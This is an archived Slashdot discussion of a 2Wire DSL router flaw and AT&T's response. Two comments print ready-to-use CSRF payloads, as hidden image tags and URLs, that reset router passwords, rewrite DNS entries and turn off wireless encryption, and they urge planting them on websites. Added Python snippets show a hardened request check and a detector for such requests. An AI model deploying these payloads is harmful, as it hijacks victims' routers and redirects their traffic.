
AT&T, 2Wire Ignoring Active Security Exploit [Updated]

An anonymous reader writes "2Wire manufactures DSL modems and routers for AT&T and other major carriers. Their devices suffer from a DNS redirection vulnerability that can be used as part of a variety of attacks, including phishing, identity theft, and denial of service. This exploit was publicly reported more than eight months ago and applies to nearly all 2Wire firmware revisions. The exploit itself is trivial to implement, requiring the attacker only to embed a specially crafted URL into a Web site or email. User interaction is not required, as the URL may be embedded as an image that loads automatically with the requested content. The 2Wire exploit bypasses any password set on the modem/router and is being actively exploited in the wild. AT&T has been deploying 2Wire DSL modems and router/gateways for years, so there exists a large vulnerable installed base. So far, AT&T/2Wire haven't done anything about this exploit."

Update: 04/09 17:48 GMT by KD: AT&T spokesman Seth Bloom sends word that AT&T has not been ignoring the problem. According to Bloom: "The majority of our customers did not have gateways affected by this vulnerability. For those that did, as soon as we became aware of the issue, we expeditiously implemented a permanent solution to close the vulnerability. In fact, we've already updated the majority of affected 2Wire gateways, and we're nearing completion of the process. We've received no reports of any significant threats targeting our customers."
This discussion has been archived. No new comments can be posted.

  • OK, now we all know (Score:2, Interesting)

    by hyades1 ( 1149581 ) <hyades1@hotmail.com> on Tuesday April 08, 2008 @05:14PM (#23005474)

    What's these bastards' excuse for standing around with their thumb up their bum for eight months while people get their lives turned inside out?

    I smell lawsuits. Many, many lawsuits.

  • by krovisser ( 1056294 ) * on Tuesday April 08, 2008 @05:29PM (#23005640)

    One of the worst routers I have ever had. Besides resetting itself arbitrarily, it would forget its own settings and revert to the default, or half of the settings would revert to the default and the other half.... ? Also, right before I threw it out my window, it forgot it was a wireless router completely. I mean, it reset itself one last time and quit broadcasting completely. Even the setup pages lost the wireless part. I could manually enter in the wireless setup URL, and it would show one with random values in each field.

    I'm just waiting for a nice cooler day to take it to the shooting range. The manual traps and some shotgun pellets might make up for all my anguish.

  • Re:I'm just glad... (Score:3, Interesting)

    by value_added ( 719364 ) on Tuesday April 08, 2008 @05:34PM (#23005700)
    I still have my old Speedstream 5100b. :)

    I'm not sure I get the joke, but if it's funny, it might be even funnier that, IIRC, I have a model with a lower number. With the exception that it doesn't reset/resync after a power failure, I guess it works like it's supposed to.

    On the other hand, I am concerned that should the little bugger fail, I'll have to purchase a newer model. Which means I'll end up with something with a metric ton of unwanted features.

    I know this isn't Ask Slashdot, but does anyone know whether it's possible to acquire, either through one's own DSL provider or elsewhere, a modem that's just a modem? Or is that just not possible these days? And maybe someone more knowledgeable than the rest of us can comment on whether it's possible to "connect" to the thing in some way to read its configuration.
  • Large install base (Score:2, Interesting)

    by Verteiron ( 224042 ) on Tuesday April 08, 2008 @05:36PM (#23005730) Homepage
    I can detect 4 of these routers from inside my house, all using the SSID 2WIRE. There must be tens of thousands of these things out there, the vast majority running the default, unsecured configuration...
  • by Jeffrey Baker ( 6191 ) on Tuesday April 08, 2008 @06:04PM (#23006032)
    2Wire access points also come hard-coded for 56-bit WEP, which can be cracked in seconds. I have a list of hundreds of WEP keys I got just from riding my bicycle around San Francisco with a laptop chugging away in my backpack. These are by far the worst access points ever deployed, and they are, sadly, also the most widely deployed in the USA.
  • by BlueUnderwear ( 73957 ) on Tuesday April 08, 2008 @06:04PM (#23006034)
    Thanks so much for that URL.

    If you want to join into the phun, put the following onto your website (or onto somebody else's website, if he happens to still use IIS):

    <img src="http://192.168.1.254/xslt?PAGE=H04_POST&amp;PASSWORD=admin&amp;PASSWORD_CONF=admin" width="1" height="1" alt="haha"/>
    <img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=google.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
    <img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.google.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
    <img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=cnn.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
    <img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.cnn.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
    <img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=slashdot.org&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
    <img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.slashdot.org&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>

  • by Jeffrey Baker ( 6191 ) on Tuesday April 08, 2008 @06:21PM (#23006194)
    Well, the 2Wire is the box the telco sends you when you order an ADSL line, so your average ignorant consumerbot has no reason to get anything else.
  • by Clueless Moron ( 548336 ) on Tuesday April 08, 2008 @07:28PM (#23006772)

    I'm sure that if I was already logged into my router, that link would work, because I know the 2wire uses cookie based authentication.

    But why on earth would I be logged into it??? Its status pages do not require a login, so the only reason to log in would be to change something, which happens maybe once a year. And the session times out after a few minutes.

    TFS (The Fine Summary) says "the 2Wire exploit bypasses any password set on the modem/router" which is blatantly false: apparently it works only if you happen to have logged into an admin page on the router within the past few minutes, which is remarkably unlikely.

    My guess is that the "exploit" is fundamentally relying on people not having changed the default router password. That way, the initial URL to set the password will work, and after that the router is pwn3d.

    Moral? Set your stupid default router password. Just like with any router.
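Added example, not part of the thread and not 2Wire firmware: a model of a settings endpoint that trusts only the session cookie, beside a hardened check that a cross-site `<img>` or auto-submitted form cannot satisfy. The function names, the `csrf_token` field and the allowed-origin list are assumptions made for illustration.

```python
import hmac
import secrets

# Assumed origins of the device's own admin UI.
ALLOWED_ORIGINS = {"http://192.168.1.254", "http://gateway.2wire.net"}


def new_session():
    """Session state created at login; the token is embedded in the admin forms."""
    return {"csrf_token": secrets.token_urlsafe(32)}


def cookie_only_allows(method, headers, session, params):
    """Weak check: any request that arrives with a live session cookie is accepted."""
    return session is not None


def hardened_allows(method, headers, session, params):
    """Accept a settings change only as a same-origin POST carrying the session token."""
    if session is None:
        return False
    if method != "POST":                      # GET must never change state
        return False
    if headers.get("Origin") not in ALLOWED_ORIGINS:
        return False                          # request was triggered by another site
    sent = params.get("csrf_token", "")
    return hmac.compare_digest(sent.encode(), session["csrf_token"].encode())


def demo():
    """Run three constructed requests through both checks."""
    session = new_session()
    change = {"PAGE": "J38_SET", "NAME": "www.example.com", "ADDR": "127.0.0.1"}
    requests = {
        # What a browser sends for an <img> on a third-party page.
        "cross_site_img": ("GET", {"Referer": "http://blog.example/post"}, dict(change)),
        # Auto-submitted form on a third-party page: POST, but wrong origin, no token.
        "cross_site_form": ("POST", {"Origin": "http://blog.example"}, dict(change)),
        # The admin UI's own form, which includes the per-session token.
        "admin_ui_form": ("POST", {"Origin": "http://192.168.1.254"},
                          dict(change, csrf_token=session["csrf_token"])),
    }
    return {name: (cookie_only_allows(m, h, session, p),
                   hardened_allows(m, h, session, p))
            for name, (m, h, p) in requests.items()}


if __name__ == "__main__":
    for name, (weak, hard) in demo().items():
        print(f"{name:16} cookie-only={weak} hardened={hard}")
```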

  • by Some_Llama ( 763766 ) on Tuesday April 08, 2008 @07:32PM (#23006814) Homepage Journal
    you don't need a script, just add this link to your webpage and force people to execute it on load:

    http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS [192.168.1.254]

    you can change the commands to do a number of different actions (pretty much any configuration change on any page in the router)

    eg:

    Add names to the DNS:
    http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=127.0.0.1 [192.168.1.254]

    Disable Wireless Authentication
    http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0 [192.168.1.254]

    Set Dynamic DNS
    http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE [192.168.1.254]

    you can also change the 192.168.1.254 to say "home" or "gateway.2wire.net"

    eg:
    Set Dynamic DNS
    http://gateway.2wire.net/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE [2wire.net]
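Added example, not part of the thread: a detection check a mail gateway or web proxy could run over HTML, flagging elements that load automatically and point at a private address or a gateway hostname like the ones quoted above. The tag list, function names and sample page are assumptions constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Tags whose URL attribute the browser fetches with no click.
AUTOLOAD = {"img": "src", "script": "src", "iframe": "src",
            "embed": "src", "link": "href"}
# Gateway hostnames named in the thread; extend per deployment.
GATEWAY_NAMES = {"home", "gateway.2wire.net"}

# Constructed sample page; the internal URLs follow the shape quoted in the thread.
SAMPLE = """
<img src="https://static.example.com/logo.png" alt="logo">
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;NAME=www.example.com&amp;ADDR=127.0.0.1" width="1" height="1"/>
<iframe src="//gateway.2wire.net/xslt?PAGE=J05_POST&amp;IP_DYNAMIC=TRUE"></iframe>
"""


def is_internal_host(host):
    """True for private, loopback or link-local IP literals and gateway names."""
    host = (host or "").lower().rstrip(".")
    if host in GATEWAY_NAMES:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # an ordinary DNS name
    return ip.is_private or ip.is_loopback or ip.is_link_local


class InternalRequestFinder(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attr = AUTOLOAD.get(tag)
        if attr is None:
            return
        try:
            parts = urlsplit(dict(attrs).get(attr) or "")
        except ValueError:
            return  # malformed URL, nothing to resolve
        # netloc is also set for protocol-relative URLs ("//host/path").
        if parts.netloc and is_internal_host(parts.hostname):
            self.findings.append({"tag": tag, "host": parts.hostname, "path": parts.path,
                                  "params": sorted(parse_qs(parts.query))})


def scan(html_text):
    """Return one finding per auto-loading element aimed at an internal host."""
    finder = InternalRequestFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings
```

A finding that carries query parameters is the one to prioritise, since a plain image fetch has no reason to pass configuration-style fields to a LAN address.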
  • Re:I'm just glad... (Score:3, Interesting)

    by houstonbofh ( 602064 ) on Tuesday April 08, 2008 @08:52PM (#23007424)
    I got a brand new speedstream 4100 with my AT&T DSL connection 8 months ago. I just had to say at least 6 times, "Yes I really do want just a modem. No I do not want a 2wire. Yes I know what I am saying. Yes I know it is free with the rebate. No I still don't want it." I also had to lie and say I was using Windows just to get my DSL turned on. I guess it like for me to talk dirty...

